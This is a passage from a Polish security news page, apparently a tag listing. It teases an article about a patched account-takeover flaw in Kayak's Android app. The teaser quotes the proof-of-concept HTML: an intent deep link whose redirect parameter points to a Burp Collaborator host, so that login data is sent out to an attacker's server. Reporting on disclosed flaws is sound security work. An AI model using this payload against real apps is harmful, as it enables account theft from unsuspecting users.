Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Tag: deep link

Klikasz na telefonie w linka i masz przejęte konto w appce mobilnej Kayaka

21 stycznia 2023, 09:26 | W biegu | komentarze 4
Klikasz na telefonie w linka i masz przejęte konto w appce mobilnej Kayaka

Parę miesięcy temu pisaliśmy o ciekawej podatności w appce mobilnej Tiktoka, a teraz świeżo załatana podatność w appce serwisu Kayak. Idąc od końca – wystarczyło podrzucić ofierze linka do strony, na której hostowany był tego typu exploicik (specyficznie przygotowany link): <!DOCTYPE html> <html> <body> <a id=”exploit” href=”jakis_intent://externalAuthentication#Intent;scheme=kayak;package=com.kayak.android;component=com.kayak.android.web.ExternalAuthLoginActivity;action=android.intent.action.VIEW;S.ExternalAuthLoginActivity.EXTRA_REDIRECT_URL=https://jsfl9yn414bp1z2sujwfjsj3ruxlla.burpcollaborator.net;end”>Exploit</a>; </body> </html> Jeśli…

Czytaj dalej »